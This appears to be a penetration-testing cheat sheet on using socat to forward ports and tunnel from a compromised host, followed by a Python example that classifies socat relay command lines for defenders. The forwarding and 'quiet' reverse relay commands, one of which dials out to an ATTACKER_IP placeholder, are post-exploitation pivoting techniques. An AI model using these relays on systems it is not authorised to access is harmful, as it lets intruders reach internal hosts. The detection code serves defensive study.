Socat

Create tunnels and forward ports using socat.

Local Port forwarding

Connect to port <compromised_host_port> on the compromised host and have the connection relayed directly to the intended target at <target_ip>:<target_port>.

./socat tcp-l:<compromised_host_port>,fork,reuseaddr tcp:<target_ip>:<target_port> &
  • fork: put every connection into a new process

  • reuseaddr: the port stays open after a connection is made to it (the option sets SO_REUSEADDR on the listening socket)

Quiet port forwarding

# on the attacker machine: create a local port relay
socat tcp-l:8001 tcp-l:8000,fork,reuseaddr &

# on the compromised machine
# create a relay server 
./socat tcp:ATTACKER_IP:8001 tcp:TARGET_IP:TARGET_PORT,fork &

You can then access the target server at localhost:ATTACKING_PORT on the attacker machine (port 8000 in the relay above).
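
For defenders reviewing process telemetry, the two relay shapes above can be told apart from the socat command line alone. The following Python code is an added example, not part of the original notes: it classifies socat invocations by whether each TCP address listens or connects. The function names (parse_address, classify, scan) are hypothetical, the sample command lines are constructed with documentation addresses, and it assumes the binary is still named socat.

```python
import re
import shlex

# socat TCP address keywords (case-insensitive), with optional 4/6 suffix.
LISTEN = re.compile(r"^tcp[46]?-(l|listen)$", re.I)
CONNECT = re.compile(r"^tcp[46]?(-connect)?$", re.I)

def parse_address(spec):
    """Split 'tcp-l:8000,fork,reuseaddr' into (role, endpoint, options)."""
    head, *opts = spec.split(",")
    keyword, _, endpoint = head.partition(":")
    role = ("listen" if LISTEN.match(keyword)
            else "connect" if CONNECT.match(keyword) else "other")
    return role, endpoint, {o.split("=")[0].lower() for o in opts}

def classify(cmdline):
    """Return a finding string for a socat TCP-to-TCP relay, or None."""
    argv = shlex.split(cmdline)
    # Assumption: the process name still starts with "socat".
    if len(argv) < 3 or not argv[0].rsplit("/", 1)[-1].startswith("socat"):
        return None
    # socat syntax is: socat [options] <address> <address>
    left, right = parse_address(argv[-2]), parse_address(argv[-1])
    roles = (left[0], right[0])
    if "other" in roles:
        return None  # e.g. STDIO or EXEC endpoints: not a pure TCP relay
    if roles == ("listen", "connect"):
        return f"forward relay: listens on {left[1]}, relays to {right[1]}"
    if roles == ("connect", "connect"):
        # No listening socket on this host, so listener audits will not show it.
        return f"reverse relay: dials out to {left[1]} and {right[1]}"
    if roles == ("listen", "listen"):
        return f"rendezvous relay: listens on {left[1]} and {right[1]}"
    return f"relay: {roles[0]} {left[1]} <-> {roles[1]} {right[1]}"

# Constructed process command lines (documentation addresses, not real hosts).
SAMPLE = [
    "./socat tcp-l:33060,fork,reuseaddr tcp:192.0.2.10:3306",
    "./socat tcp:198.51.100.7:8001 tcp:192.0.2.10:80,fork",
    "socat tcp-l:8001 tcp-l:8000,fork,reuseaddr",
    "socat - tcp:192.0.2.10:80",
    "/usr/sbin/sshd -D",
]

def scan(lines):
    """Return (command line, finding) pairs for lines that look like relays."""
    return [(l, f) for l in lines if (f := classify(l))]

if __name__ == "__main__":
    for line, finding in scan(SAMPLE):
        print(f"{finding}\n    {line}")
```

The connect-to-connect case is the one to watch on internal hosts: it opens no listening port there, so it only shows up in process command lines and outbound connection logs.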

Static Binary: https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/socat
